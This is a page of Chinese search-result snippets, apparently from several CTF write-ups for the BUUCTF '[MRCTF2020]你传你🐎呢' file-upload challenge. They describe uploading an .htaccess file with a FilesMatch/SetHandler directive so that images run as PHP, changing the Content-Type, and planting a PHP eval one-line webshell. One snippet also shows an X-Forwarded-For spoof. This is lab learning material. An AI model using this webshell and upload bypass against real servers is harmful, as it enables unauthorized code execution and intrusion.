题目链接:https://buuoj.cn/challenges#[MRCTF2020]你传你🐎呢 打开环境后如下所示。 可以看到,这是一道文件上传题,直接对可上传的文件类型进行 fuzzing。 通过fuzzing 发现,可以上传 .jpg、.html、.htaccess 文件,PHP 相关的文件均无法上传。 因此,可以选择上传 .htaccess 文件,让后端将所有 .jpg 文件都当作 ...
BUUCTF[MRCTF2020]你传你🐎呢 1 解题思路 打开界面 1,先用hack.php试试,传不上去。 2,尝试用hack.png上传,用burp Suite 将后缀改为.php,发现也没用。 3,想到了用.htaccess文件,尝试一下 原理: .htaccess文件(或者"分布式配置文件"),全称是Hypertext Access(超文本入口)。提供了针对目录改变配置的方法, 即...
http://318d1d68-eac7-487a-ab2a-a546b157e042.node3.buuoj.cn/?gg[]=1&id[]=2 POST:passwd=1234567x [MRCTF2020]PYWebsite 打开看源码,有提示:flag.php flag.php.png 根据提示我自己可以看到flag,添加X-Forwarded-For:127.0.0.1访问得到flag [MRCTF2020]Ezpop 参考:https://blog.csdn.net/weix...
1 Pragma: no-cache Cache-Control: no-cache ---192868467538331501802736339120 Content-Disposition: form-data; name="uploaded"; filename=".htaccess" Content-Type: image/png <FilesMatch "1.png"> SetHandler application/x-httpd-php </FilesMatch> ---192...
2.1那么现在开始写一个.htaccess文件,里面的内容为: <FilesMatch"1.png">SetHandler application/x-httpd-php</FilesMatch> 2.2上传.htaccess文件 2.3用蚁剑链接,得到flag 3.借鉴 (31条消息) BUUCTF之[MRCTF2020]你传你呢---文件解析漏洞_若丶时光破灭的博客-CSDN博客...
BUUCTF | [MRCTF2020]你传你🐎呢 |0.htaccess简介 .htaccess文件(分布式配置文件),提供了针对目录改变配置的方法, 就是在一个特定的文件目录中放置一个包含多个指令的文件,以作用于此 目 录及其子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache 的allowOverride指令来设置。httpd.conf文件中设置...
[MRCTF2020]你传你🐎呢 [MRCTF2020]你传你🐎呢 和.user.ini那道题有异曲同工之处,[SUCTF 2019]CheckIn 提前上传一个.htaccess文件,注意上传的时候要把Content-Type改为image/jpeg才能绕过成功上传。 SetHandler application/x-httpd-php 然后上传shell.jpg,内容为:...
【Buuctf】[MRCTF2020]你传你🐎呢 文件上传,那就传个一句话木马 最基础的代码,新建一个php文件,写入 <?php@eval($_POST['attack'])?> 抓包 修改文件后缀为jpg,更改Content-Type为image/jpeg 传入的是jpg文件,我们需要这个解析成php文件,需要再传一个htaccess文件 ...
buuctf(web):[MRCTF2020]你传你🐎呢 打开链接,发现如图 正常操作,查看是否是前端绕过,上传一句话木马,发现不可行。尝试抓包,修改文件格式 发现也不行,那猜测可能是.htaccess文件解析,所以先将一句话木马改为图片格式 发现可以上传成功,接着上传.htaccess
[MRCTF2020]你传你🐎呢 这道题我们尝试先直接去传一下php格式文件,发现不行,然后再传一下phtml格式文件,发现也是不行,然后再尝试一下jpg格式发现可以,所以我们就传jpg格式的木马,而且我们发现这道题可以传.htaccess文件,这个.htaccess文件的作用就是把这个图片文件解析成php代码执行 ...